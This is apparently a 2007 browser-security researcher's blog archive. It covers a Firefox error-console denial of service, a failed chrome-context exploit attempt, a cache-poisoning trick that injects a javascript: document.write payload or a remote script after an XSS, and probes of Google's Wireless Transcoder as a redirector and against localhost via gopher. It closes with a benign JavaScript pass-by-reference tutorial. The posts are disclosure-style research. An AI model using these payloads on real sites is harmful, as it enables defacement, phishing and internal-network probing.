Sunday, July 29, 2007

DoSing Firefox with Error Consoles

3 days ago, I found out that there was a way of Popping up the Firefox JavaScript Error Console, by doing:

<iframe src="javascript:"></iframe>

I was testing what could I do to exploit it, (like trying to execute some code in the chrome:// context), but I wasn't able..

This was 1 of my failed attacks.. to steal chrome context:

throw new function(){
this.toString=this.valueOf=function(){
alert(location);
return "<script>alert(location);</script>";
}
}


For the ones that doesn't know this, throw will "throw" an error exception.. :P

Any way, then while playing with the multiple consoles I had, I realized that if for example, you click "clear" on one console, all the consoles will clear the error messages.. so maybe, the memory allocated at the time of showing errors, won't be checked as well..

I made a PoC of a memory exhaustion exploit at firefox (It's a DoS exploit, You Have been Warned), which I talked about with Giorgio Maone, and it appears that this was just a Denial of Service attack (that I think depends on the amount of RAM the victim has, for example RSnake just suffered a temporal freezing of the browser, and after closing the error consoles, everything went back to normal), ma1 told me to file it anyway to bugzilla, (thing that I did today), but I don't know for sure if a memory exhaustion bug, will be considered a real bug at Mozilla.. anyway, NoScript users are already invulnerable to this attack (since yesterday, I think).

Friday, July 27, 2007

Temporal Cache Poisoning (IExplorer and Firefox) = Feature?

While making estigma's function EditHTML() (a WYSIWYG editor), I realized that the code modified, will stay on cache, until you close the browser, or exit the website and enter again.

At the time, I was too busy to check it deeply, and I guessed it has something to do with the removeNode function I was using.. Any way, yesterday I retook the investigation, and it appears that the only thing you need for modifying the cached version of a website, is to access:

javascript:document.write("content");document.close();

Using the javascript: URI, in the target webpage.

This was very interesting, because that meant, that you could modify the cached version of any webpage in a domain that you have access, so for example if a website has a XSS bug in any place of the website..

http://www.victim.com/this/website/is/vulnerable.php

It will be able to modify the www.victim.com/index cached version.

This will be done in a very simple way, I've uploaded a PoC, so you can test it in any website using..
<script src="//sirdarckcat.net/cache_poisoning.js"

This code, will open a window, to the current directory index, and 5 seconds later, it will modify the cached version of the webpage.

Once you enter that website, and hit refresh, the content won't change, because the cached version of the website is the one generated by the javascript code.

As I was investigating this, Mario Heiderich explained me that this type of attack, may be used for confusing siteoweners to obfuscate the real attack like reporting a minor vuln to draw attention while exploiting the grave flaw.

Any way, while talking about this with Giorgio Maone, this (apparently) is the browser's desired behavior (to save the javascript generated code in the cache), so this is not a bug, it's a feature!.

The impact has already been explained by Mario Heiderich, and another (possible attack), could be to make a fake deface to a website index, any way, I'm impressed that this is actually what the web browser wants.

Thursday, July 26, 2007

Playing with Google Wireless Transcoder

Last Week, I found Google Wireless Transcoder, and I started playing with it trying to find a XSS bug in the HTML "transcoder", and I shared it with Ronald, RSnake, and .mario.
What the Google Wireless Transcoder does, is pretty simple, it get's HTML code, and translate's it into XHTML mobile compilant code.
The way it works is a little mysterious (it's made in Java b.t.w.).. It could be something similar to HTML Purifier (this was pointed out by .mario), but I would say, that it works as a server-side browser, that generates valid XHTML code reconstructing the DOM.. (which in fact is not very difficult to do).. I think this because there are some errors very similar to other Java browsers, like jrex.. or jakarta (the GWT supports ftp:// gopher:// http:// between others..) for example:

This is an exception generated by this code:

http://jakarta.apache.org/commons/httpclient/xref/org/apache/commons/httpclient/HttpHost.html

So this makes me believe that they (at least) use HttpHost.java
They also use BASE64DecoderStream.java

Any way, there are some other errors like this one:

This is an exception generated by Firefox, because GWT returned invalid XHTML.. this is interesting, because it demonstrates that in some way, the GWT supports javascript URI.
(this website is googlr.com, that is a mirror of google.com, for avoiding the session generated at google.com).

We can also see that GWT, can be used as a "redirector", like:
http://www.google.com/gwt/n?u=http://www.vidoblog.net/ip/&_gwt_pg=orig

note the _gwt_pg

We can also temporarily host images, we just need to enter any website that contains images, (like google.com).
http://www.google.com/gwt/n?u=www.google.com
and the logo, will have an url simillar to:
http://www.google.com/gwt/i?i=01F8441E4_F9610322_4DB7F91D

Another interesing thing that RSnake pointed out is that, this "internal proxy's" are "logically
separated from their internal addresses." Any way, I found very interesting that:

http://www.google.com/gwt/n?u=gopher://local.sirdarckcat.net
http://www.google.com/gwt/n?u=gopher://unexistent

returns something different to:

http://www.google.com/gwt/n?u=gopher://127.0.0.1
http://www.google.com/gwt/n?u=gopher://localhost
http://www.google.com/gwt/n?u=gopher://localhostABCD

Even do local.sirdarckcat.net, and localhost (supposedly) point's to 127.0.0.1, but localhostABCD doesn't. why.. gopher://unexistent is different to gopher://localhostABCD ? maybe it's a way to avoid an attacker to contact 127.0.0.1..

We could try to enumerate the "alive" hosts with local.sirdarckcat.net:port#, but as far as I tested, all ports return's the same.

Something else that was discovered was that GWT parses data URIs.

http://www.google.com/gwt/n?u=data:text/html;base64,PGh0bWw%2BDQo8aGVhZD4NCjx0aXRsZT5IZWxsbyBXb3JsZDwvdGl0bGU%2BDQo8L2hlYWQ%2BDQo8Ym9keT4NCkczDQo8L2JvZHk%2BDQo8L2h0bWw%2B

pretty amazing it's the first web-proxy (I've seen) that actually parses them..

For ending, I think that GWT is a great tool, has a lot of features (some of them hidden to naive eyes). I think this should be investigated more deeply, (for example the impact of using GWT as a SEO technique, to use GWT pagerank as an inbound link to your site).

Greetz!!

Saturday, July 07, 2007

Passing Variables by Reference in JavaScript

Long time ago, when I was learning C, and I understood the use of pointers, I started thinking if there was a way to pass the JavaScript variables by reference.
I had a lot of ideas, but they didn't worked as spected.

For example, for global variables in a browser, I could use:

function modifyVar(varName,newVal){
window[varName]=newVal;
}
var x=123;
alert(x);
modifyVar("x",321);
alert(x);


anyway, this was only valid for "Global" variables..

Then I thought about using caller.call (even do it is not exportable).

function modifyVar(varName,newVal){
modifyVar.caller.call(eval,varName+"="+newVal);
}
var x=123;
alert(x);
modifyVar("x",321);
alert(x);

anyway, this didn't work neither, there was an strange error named "Too much recursion".

Then, a lot of time after that, (actually.. yesterday), I realized that the Objects in javascript are passed as reference, so..

function modifyVar(obj,newVal){
obj.value=newVal;
}
var m={value: 1};
alert(x);
modifyVar("x",321);
alert(x);


and the attribute was modified successfully :).


Any way, this wasn't good enough, I wanted to be able to send a variable as a parameter in an instruction, and be able to modify it's content inside the function.

There's when I realize (after some testing), that I can set any variable as an object, and allow it to have any primitive value I want, for example:

var w=Object("some string");


will behave just like:

var w="some string";


and that:

var w=Object(123);


will behave just like:

var w=123;


and the same for regular expressions, functions, other objects, etc..

So by means of this, I was able to transform any variable into a "referenceable" variable.

Any way, for modifying this variable, I couldn't use any Assignment Operators, because they would destroy the Object.. I needed to modify it's contents from "inside", using it's Methods.

So I found three methods that returned the value of an object:
  • toSource();
  • toString();
  • valueOf();

The last one is the most important one, it's value is the one that will be treated "officially", except for String and Source operations.. so by doing:

function modifyVar(obj,val){
obj.valueOf=obj.toSource=obj.toString=function(){return val}
}


we would actually be modifying the value of "obj".

any way, this wasn't just enough.. I wanted a way to reference variables as easy as in C or PHP.. so.. why not making a prototype function of object that allows me to modify the variable..

so I did this:

Object.prototype.$=function $(val){if(val)this.valueOf=this.toSource=this.toString=function(){return val};return val;};

so, variable.$("new val"); will modify the content of variable, "globally".

Here you can see the way this works:

// Object reference maker
Object.prototype.$=function $(val){if(val)this.valueOf=this.toSource=this.toString=function(){return val};return val;};


function value(variable){
// function to modify the variable through =
variable="new_value";
}

function reference(variable){
//function to modify the variable through reference
variable.$("new_value");
}

var w="standard"; // standard value

w=Object(w);// transform to object.
alert(w); // show that the value is still the same
// standard
value(w); // try to change it's content's via =
alert(w); // show if the content's have been modified
// standard
reference(w); // try to modify the content's via reference
alert(w); // show the new value
// new_value


Hope this is useful for anybody that requires to modify a "private" variable where it's not accessible.. here is an example of Object, and a way to modify its private variables (which shouldn't be possible due to the O.O.P. Paradigm)..

Object.prototype.$=function $(val){if(val)this.valueOf=this.toSource=this.toString=function(){return val};return val;};
function DownTown(){
var private=Object("You cant modify me");
this.get=function(){
return private;
}
this.export=function(callback){
callback(private);
}
}
var blackbox=new DownTown();
alert(blackbox.get());
blackbox.export(function(x){x.$("new val!")});
alert(blackbox.get());